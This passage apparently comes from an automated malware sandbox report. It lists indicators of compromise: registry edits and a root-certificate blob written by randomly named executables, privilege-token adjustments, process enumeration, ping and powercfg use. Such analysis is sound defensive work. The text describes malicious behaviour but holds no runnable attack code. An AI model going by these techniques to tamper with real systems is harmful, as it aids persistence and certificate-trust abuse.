Settings\MuiCache\22\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" GNL8HPgpc3h1ughp9OmayOAG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" GNL8HPgpc3h1ughp9OmayOAG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Modifies registry class 44 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000b3a38ce0bd68da01661a67a3cd68da0170e5dda10873da0114000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\NodeSlot = "5" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\MRUListEx = ffffffff Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 820074001c004346534616003100000000005a589971120041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe5a5899716a5852832e000000a8e101000000010000000000000000000000000000001a54ab004100700070004400610074006100000042000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\ShowCmd = "1" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings taskmgr.exe Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 50003100000000006a58b78310004c6f63616c003c0009000400efbe5a5899716a58b7832e000000bbe101000000010000000000000000000000000000001ebd1d014c006f00630061006c00000014000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 = 5e003100000000006a5887831000424142592d437e310000460009000400efbe6a5886836a5887832e0000000eda01000000070000000000000000000000000000009e132a0142004100420059002d0043006c006f0063006b00000018000000 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\HotKey = "0" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = 00000000ffffffff Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 Process not Found Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell Process not Found -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 tJ6HSphWPkDhrW4fuBx7FKRM.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e tJ6HSphWPkDhrW4fuBx7FKRM.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e tJ6HSphWPkDhrW4fuBx7FKRM.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5700 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3300 Process not Found -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2428 taskmgr.exe 3300 Process not Found 4688 mmc.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5168 vn0dZ1KknFaoEqIsGOGNDVH5.exe 5488 cwvffbi 3148 q4oVVOJYlJSTjyE4pBQQcwUd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2428 taskmgr.exe Token: SeSystemProfilePrivilege 2428 taskmgr.exe Token: SeCreateGlobalPrivilege 2428 taskmgr.exe Token: SeDebugPrivilege 5724 regsvcs.exe Token: SeDebugPrivilege 5148 powershell.exe Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeDebugPrivilege 1892 powershell.exe Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeDebugPrivilege 5132 GNL8HPgpc3h1ughp9OmayOAG.exe Token: SeImpersonatePrivilege 5132 GNL8HPgpc3h1ughp9OmayOAG.exe Token: SeShutdownPrivilege 2364 powercfg.exe Token: SeCreatePagefilePrivilege 2364 powercfg.exe Token: SeShutdownPrivilege 4564 powercfg.exe Token: SeCreatePagefilePrivilege 4564 powercfg.exe Token: SeShutdownPrivilege 2140 powercfg.exe Token: SeCreatePagefilePrivilege 2140 powercfg.exe Token: SeShutdownPrivilege 5140 powercfg.exe Token: SeCreatePagefilePrivilege 5140 powercfg.exe Token: SeDebugPrivilege 5396 powershell.exe Token: SeDebugPrivilege 5300 powershell.exe Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeSecurityPrivilege 4688 mmc.exe Token: SeShutdownPrivilege 3300 Process not Found Token: SeCreatePagefilePrivilege 3300 Process not Found Token: SeShutdownPrivilege 3300 Process not Found -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 2428 taskmgr.exe 